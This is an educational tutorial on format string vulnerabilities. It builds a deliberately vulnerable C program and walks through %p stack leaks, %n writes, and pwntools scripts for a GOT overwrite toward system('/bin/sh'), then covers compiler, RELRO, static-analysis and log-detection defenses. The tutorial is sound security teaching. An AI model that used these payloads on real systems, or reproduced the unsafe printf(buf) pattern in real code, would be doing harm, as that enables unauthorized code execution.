Format String Vulnerabilities Explained: From %p Leaks to Arbitrary Write

Disclaimer: This article is for education and authorized security testing only. Run every command in your own lab or against systems you have explicit written permission to test. Exploiting software you do not own or control is illegal in most jurisdictions.

Introduction / Overview

A format string vulnerability is one of the cleanest primitives in binary exploitation: a single misused printf-family call can be coerced into both an arbitrary read and an arbitrary write. The bug class is old (CWE-134, "Use of Externally-Controlled Format String"), yet it still surfaces in CTFs, embedded firmware, and legacy C code. Famous real-world cases include CVE-2012-0809 (sudo's sudo_debug format string) and the wu-ftpd site exec bug.

The root cause is simple. When a program calls printf(user_input) instead of printf("%s", user_input), the attacker controls the format string itself. Because the variadic printf blindly trusts the format string to tell it how many arguments were pushed, attacker-supplied conversion specifiers like %p and %n read and write the process's stack and memory.

How it works / Background

printf is variadic: it pulls arguments off the stack (or registers, on x86-64) according to the format string. It has no way to know how many arguments the caller actually passed. If you supply more conversion specifiers than there are real arguments, printf happily walks past them into adjacent stack memory.
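
The over-read can be pictured with a toy model. This is only a sketch: `toy_printf` and the slot values are hypothetical, and the real printf walks registers and stack memory rather than a Python list.

```python
import re

def toy_printf(fmt, args, stack):
    """Toy model: every %p consumes the next slot, real arguments first."""
    slots = list(args) + list(stack)   # printf cannot tell where `args` ends
    out, i = [], 0
    for piece in re.split(r"(%p)", fmt):
        if piece == "%p":
            out.append(hex(slots[i]))  # read whatever sits in the next slot
            i += 1
        else:
            out.append(piece)
    return "".join(out)

# The caller passed one real argument, but the format asks for three values,
# so the second and third reads come from neighbouring stack contents.
leak = toy_printf("%p.%p.%p", args=[0x1], stack=[0xdeadbeef, 0x401136])
print(leak)
```

The last two values were never passed by the caller, which is exactly the leak an attacker is after.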

Two specifiers matter most:

  • %p (or %x): leak. Reads the next argument slot and prints it as a pointer/hex value; on x86-64, %p (or %lx) shows the full 8 bytes, while %x shows only the low 4. Chaining many of these dumps the stack, including saved return addresses, canaries, and libc pointers.
  • %n: write. Instead of printing, %n writes the number of bytes printed so far into the address pointed to by the corresponding argument. Combined with width specifiers like %100c, you control exactly what value gets written. Variants: %hn (2-byte write) and %hhn (1-byte write) let you write smaller chunks to avoid printing billions of characters.
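
As a rough illustration of what the %n family stores, the sketch below models the stored value as the running output count truncated to the width of the write. The helper name `n_store` is hypothetical and the model ignores signedness.

```python
def n_store(printed, spec):
    """Bit pattern stored by a %n-family conversion after `printed` output bytes."""
    bits = {"%hhn": 8, "%hn": 16, "%n": 32}[spec]   # char, short, int
    return printed % (1 << bits)

# "%100c%hhn": 100 characters have been printed when %hhn is reached
after_pad = n_store(100, "%hhn")
# The count wraps at the write size, so 0x1234 printed bytes store 0x34 via %hhn
wrapped = n_store(0x1234, "%hhn")
print(hex(after_pad), hex(wrapped), hex(n_store(0x1234, "%hn")))
```

The wrap-around is what makes byte-wise writes practical: any byte value can be reached with fewer than 256 characters of additional padding.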

The positional notation %7$p directly accesses the 7th argument slot, which is essential once you locate your controlled buffer on the stack. The standard pivot is a GOT overwrite: redirect a Global Offset Table entry (e.g. printf@got) to system so that the next call through that entry runs system on attacker-chosen input.

Prerequisites / Lab setup

We will build a deliberately vulnerable binary on Linux x86-64. You need gcc, gdb with pwndbg or GEF, and pwntools.

# Ubuntu / Kali
sudo apt update && sudo apt install -y gcc gdb python3-pip
pip3 install pwntools

The vulnerable program:

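// vuln.c
#include <stdio.h>
#include <unistd.h>

void vuln(void) {
    char buf[128] = {0};             // zeroed so the input is always NUL-terminated
    read(0, buf, sizeof(buf) - 1);   // read() adds no terminator, so leave room for one
    printf(buf);          // BUG: user-controlled format string
    fflush(stdout);
}

int main(void) {
    vuln();
    return 0;
}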

Compile with modern protections deliberately weakened so the mechanics are visible:

gcc -m64 -fno-stack-protector -no-pie -z norelro -o vuln vuln.c
checksec --file=./vuln

-no-pie keeps addresses static, and -z norelro keeps the GOT writable — both make the GOT overwrite straightforward for learning.

Walkthrough / PoC

Step 1 — Confirm the bug and find your offset

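Feed format specifiers and watch the program leak stack data. The payload is passed to the shell's printf as an argument to %s, because the shell's own printf would otherwise try to interpret the %p specifiers itself:

printf '%s\n' 'AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p' | ./vuln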

To find which argument index holds your buffer, send a known marker followed by a longer run of %p reads:

python3 -c 'print("AAAAAAAA" + ".%p"*12)' | ./vuln

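When a leaked value equals 0x4141414141414141, that slot index is where your input lands. On x86-64 the first six integer arguments travel in registers. The format string itself takes the first (rdi), so slots 1 to 5 come from rsi, rdx, rcx, r8, and r9, and slot 6 is the first stack slot. The stack-resident buffer therefore typically appears at or shortly after offset 6. Verify precisely with an 8-byte marker, since %p reads a full 8-byte slot:

python3 -c 'print("ABCDEFGH" + "%6$p")' | ./vuln

If it prints ABCDEFGH0x4847464544434241 (the marker bytes in little-endian order), offset 6 points at your buffer.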
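
The offset search can also be scripted. The sketch below parses a dot-separated run of %p output and returns the slot that matches the marker; `find_offset` and the sample output line are made up for illustration, so real values will differ.

```python
def find_offset(output, marker=b"AAAAAAAA"):
    """Return the 1-based argument index whose leaked value equals the marker."""
    want = int.from_bytes(marker, "little")      # 0x4141414141414141 for eight 'A's
    fields = output.strip().split(".")[1:]       # drop the echoed marker itself
    for index, field in enumerate(fields, start=1):
        if field != "(nil)" and int(field, 16) == want:   # glibc prints NULL as (nil)
            return index
    return None

# Hypothetical output of the "AAAAAAAA" + ".%p"*N probe
sample = "AAAAAAAA.0x7ffc1.0x80.(nil).0x7f2a.0x1.0x4141414141414141.0xa"
offset = find_offset(sample)
print(offset)
```

A return value of None means the marker was not reached and the probe needs more %p reads.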

Step 2 — Leak useful pointers

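Dump slots beyond your own buffer and identify libc and stack addresses. -no-pie fixes only the binary's own addresses; libc and the stack are still randomized by ASLR, so these leaks are what let you locate system or gadgets. With the buffer starting at slot 6 and occupying 128 bytes (16 slots), slots 6 through 21 just echo your own input. On a typical unoptimized build the saved frame pointer and return address follow at slots 22 and 23:

# leak.py
from pwn import *

io = process('./vuln')
io.sendline(b'%22$p|%23$p|%24$p|%25$p')
print(io.recvline())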
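
Once a line of leaks comes back, it helps to sort the values by address range. The following is a heuristic sketch only: the helper names, the sample reply, and the range boundaries are assumptions based on common Linux x86-64 layouts, so confirm any guess against the process memory map in gdb.

```python
def parse_leaks(line, first_index):
    """Map argument index -> value for a reply to a '%N$p|%N+1$p|...' probe."""
    leaks = {}
    for index, field in enumerate(line.strip().split("|"), start=first_index):
        leaks[index] = 0 if field == "(nil)" else int(field, 16)
    return leaks

def classify(value):
    """Very rough guess from the address range alone."""
    if 0x400000 <= value < 0x500000:
        return "binary (non-PIE)"
    if value >> 40 == 0x7F:
        return "stack or shared library"
    return "data / unknown"

# Hypothetical reply; pwntools returns bytes, so decode before parsing
reply = b"0x7ffd5c1e2b90|0x401199|0x1|0x7f3c1a229d90\n".decode()
for index, value in parse_leaks(reply, first_index=22).items():
    print(index, hex(value), classify(value))
```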

Step 3 — Arbitrary write with %n

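pwntools' fmtstr_payload builds the %n write for you. It computes the width specifiers and packs the target addresses automatically, provided the pwntools context is set to the target architecture (the default is 32-bit i386):

# write.py
from pwn import *

context.binary = elf = ELF('./vuln')   # sets arch to amd64 so addresses pack as 8 bytes
io = process('./vuln')

OFFSET     = 6
got_fflush = elf.got['fflush']

# printf is never called again after the write, so redirecting printf@got would
# change nothing in this one-shot program. fflush(stdout) runs right after printf
# returns, so pointing fflush@got at vuln() re-enters the read/printf sequence.
payload = fmtstr_payload(OFFSET, {got_fflush: elf.symbols['vuln']})
assert len(payload) < 128              # the payload must fit in buf
io.sendline(payload)
io.interactive()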
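
To see what such a payload looks like on the inside, here is a hand-rolled sketch using only the standard library. It is not pwntools' algorithm, and its output will differ from fmtstr_payload. The function name and the addresses are hypothetical. It assumes the buffer starts at `offset` and that the format part can be padded to a multiple of 8 bytes so the appended addresses land on whole slots.

```python
import struct

def build_hhn_payload(offset, target, value, nbytes=8, slot=8):
    """Sketch: write the low `nbytes` bytes of `value` to `target` using %hhn."""
    # (byte value, destination address) pairs, smallest byte first, so the
    # running output count only ever has to grow.
    writes = sorted(((value >> (8 * i)) & 0xFF, target + i) for i in range(nbytes))
    fmt_len = slot
    while True:
        first_arg = offset + fmt_len // slot      # slot index of the first address
        fmt, printed = "", 0
        for k, (byte, _) in enumerate(writes):
            pad = byte - printed
            if pad:
                fmt += "%1${}c".format(pad)       # print `pad` more characters
            fmt += "%{}$hhn".format(first_arg + k)
            printed = byte
        if len(fmt) <= fmt_len:
            break
        fmt_len += slot                           # grow, then recompute the indexes
    addrs = b"".join(struct.pack("<Q", addr) for _, addr in writes)
    return fmt.encode().ljust(fmt_len, b"A") + addrs

# Hypothetical non-PIE addresses; only 3 bytes are written on the assumption
# that the upper bytes of the old GOT value are already zero.
payload = build_hhn_payload(offset=6, target=0x404018, value=0x401136, nbytes=3)
print(len(payload), payload[:40])
```

The addresses go at the end because they contain NUL bytes, which would otherwise terminate the format string before the conversions are processed.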

Step 4 — GOT overwrite to pop a shell

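To get code execution, point a GOT entry at system and arrange for a /bin/sh argument. A common technique is to overwrite printf@got (or puts@got in programs that print with puts) with system, then send /bin/sh so that the next printf(buf) call becomes system("/bin/sh"). This takes several rounds of input, so it assumes vuln() is re-entered after each printf, for example through the GOT redirect from Step 3. The skeleton below leaves the leak parsing and base calculation open:

# exploit.py
from pwn import *

context.binary = elf = ELF('./vuln')   # amd64 context for p64 and fmtstr_payload
libc = elf.libc
io   = process('./vuln')

OFFSET = 6

# 0) Assumes vuln() is re-entered after every printf (see Step 3)

# 1) Leak a libc address from the GOT to defeat ASLR.
#    %7$s dereferences slot 7, which holds the address appended after the
#    8-byte format part. A bare %6$p would only echo the buffer itself.
io.sendline(b'%7$s||||' + p64(elf.got['read']))
# ... compute libc base from the leak ...
# system = libc_base + libc.symbols['system']

# 2) Overwrite printf@got with system
# payload = fmtstr_payload(OFFSET, {elf.got['printf']: system})
# io.sendline(payload)

# 3) Next input becomes the argument to system
# io.sendline(b'/bin/sh\x00')
io.interactive()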
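
The "compute libc base" step is plain arithmetic, sketched below with made-up numbers. The offsets and the leaked address are hypothetical; in practice the offsets come from the exact libc the target uses (for example via libc.symbols in pwntools).

```python
PAGE = 0x1000

def libc_base_from_leak(leaked_addr, symbol_offset):
    """Subtract the symbol's offset inside libc from its leaked runtime address."""
    base = leaked_addr - symbol_offset
    if base % PAGE != 0:
        # A load base is page-aligned; anything else means a wrong libc or symbol
        raise ValueError("base %#x is not page-aligned" % base)
    return base

# Hypothetical values for illustration only
READ_OFFSET   = 0x114980
SYSTEM_OFFSET = 0x50d60
leaked_read   = 0x7f3c1a314980

libc_base   = libc_base_from_leak(leaked_read, READ_OFFSET)
system_addr = libc_base + SYSTEM_OFFSET
print(hex(libc_base), hex(system_addr))
```

The alignment check is a cheap sanity test: a misaligned base usually means the leak was parsed incorrectly or the offsets belong to a different libc build.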

Always prefer %hhn byte-by-byte writes (pwntools does this by default) so you never have to print billions of padding characters for a full 8-byte pointer.
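
A quick calculation shows why the chunk size matters. The sketch assumes the chunks are written in ascending order of value, so the total output equals the largest chunk. The pointer value is hypothetical.

```python
def padding_needed(value, chunk_bytes, total_bytes=8):
    """Characters printed to write `value` in ascending chunks of `chunk_bytes`."""
    mask = (1 << (8 * chunk_bytes)) - 1
    chunks = [(value >> (8 * chunk_bytes * i)) & mask
              for i in range(total_bytes // chunk_bytes)]
    # Written smallest first, the output counter only climbs to the largest chunk
    return max(chunks)

pointer = 0x7f3c1a250d60          # hypothetical libc address
for spec, size in (("%lln", 8), ("%hn", 2), ("%hhn", 1)):
    print(spec, padding_needed(pointer, size))
```

A single 8-byte write needs as many output characters as the pointer's numeric value, while byte-wise writes never need more than 255 in total.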

Mermaid diagram

[Diagram 1: format string exploitation flow, from %p leaks to arbitrary write]

The diagram shows the two primitives: %p reads to defeat ASLR, and %n writes to hijack a GOT entry, converging on system("/bin/sh") for code execution.

Detection & Defense (Blue Team)

Format string bugs are almost entirely preventable. Mitigations span the source, the compiler, and runtime hardening.

1. Never pass user data as a format string. The single most effective fix:

printf("%s", user_input);   // correct
puts(user_input);           // also fine

2. Compiler warnings as errors. GCC and Clang detect non-literal format strings:

gcc -Wformat=2 -Wformat-security -Werror=format-security -o app app.c

-Wformat-security flags printf(buf) at compile time. Make it a hard build failure in CI.

3. Static analysis. Run flawfinder, cppcheck, or semgrep to catch CWE-134 patterns across a codebase:

flawfinder --minlevel=4 src/
semgrep --config "p/c" src/
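
To make concrete what these tools look for, here is a deliberately naive line-based sketch. It is not how flawfinder or semgrep work internally, and it misses multi-line calls, macros, and wrappers. The function table and helper name are assumptions for illustration.

```python
import re

# 0-based position of the format parameter for a few printf-style functions
FORMAT_ARG = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2, "syslog": 1}
CALL = re.compile(r"\b(%s)\s*\(([^;]*)\)\s*;" % "|".join(FORMAT_ARG))

def suspicious_calls(source):
    """Return (line number, function) for calls whose format is not a literal."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in CALL.finditer(line):
            name = match.group(1)
            # Naive comma split; good enough to reach the format argument here
            args = [arg.strip() for arg in match.group(2).split(",")]
            index = FORMAT_ARG[name]
            if index < len(args) and not args[index].startswith('"'):
                hits.append((lineno, name))
    return hits

sample = '''printf(buf);
printf("%s", user_input);
snprintf(out, sizeof(out), fmt, value);
fprintf(stderr, "error: %d\\n", code);
'''
print(suspicious_calls(sample))
```

A hit only means the format argument is not a string literal; whether it is attacker-reachable still needs review.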

4. Runtime hardening. Enable Full RELRO so the GOT is mapped read-only after relocation, neutering GOT overwrites:

gcc -Wl,-z,relro,-z,now -fstack-protector-strong -pie -fPIE -o app app.c
checksec --file=./app

Full RELRO (-z now) is the key control here; combined with PIE/ASLR it raises the cost of any %n-based write substantially. FORTIFY_SOURCE (-D_FORTIFY_SOURCE=2, which takes effect only when optimization such as -O2 is enabled) additionally makes glibc abort at runtime when a format string containing %n resides in writable memory.

5. Detection. Monitor crash telemetry: format string exploitation produces characteristic SIGSEGV patterns from %n writes to unmapped addresses. Log-scan FTP/CGI/syslog inputs for clustered % specifiers. In ATT&CK terms this maps to T1203 (Exploitation for Client Execution), or to T1190 (Exploit Public-Facing Application) when the target is a network-facing service; treat repeated crashes in a printf call frame as an exploitation indicator and capture cores for triage.
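
The log-scanning idea can be sketched as a small filter. The regular expression, the threshold of four specifiers, and the function name are illustrative assumptions, not a tuned detection rule. URL-encoded input such as %20 followed by a letter can trigger false positives.

```python
import re

# printf-style conversion: optional N$ position, flags, width, precision, length
SPEC = re.compile(
    r"%(?:\d+\$)?[-+#0]*\d*(?:\.\d+)?(?:hh|h|ll|l|z|j|t|L)?[pxXnsdiuc]"
)

def looks_like_format_attack(text, threshold=4):
    """Flag input with many conversion specifiers or any %n-family write."""
    specs = SPEC.findall(text)
    has_write = any(spec.endswith("n") for spec in specs)
    return has_write or len(specs) >= threshold

for line in ("USER anonymous", "AAAA%p.%p.%p.%p", "%7$hhn", "progress 100% done"):
    print(repr(line), looks_like_format_attack(line))
```

Any %n in user-supplied input is treated as suspicious on its own, since legitimate clients have little reason to send it.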

For deeper static triage of an unknown binary, decompiling the call site in Ghidra quickly reveals whether the format argument is a literal or attacker-reachable, and a GDB and pwndbg workflow confirms the exploitability dynamically.

Conclusion

Format string vulnerabilities pack two powerful primitives into one bug: %p for reading the stack and %n for arbitrary write. Once you can locate your buffer offset (%N$p) and write to a chosen address, a GOT overwrite to system is a short hop to a shell. The defensive story is equally clear: pass user data as an argument, never as the format, enable -Werror=format-security, and ship with Full RELRO. For more on the next pivot step, see Return-Oriented Programming basics.
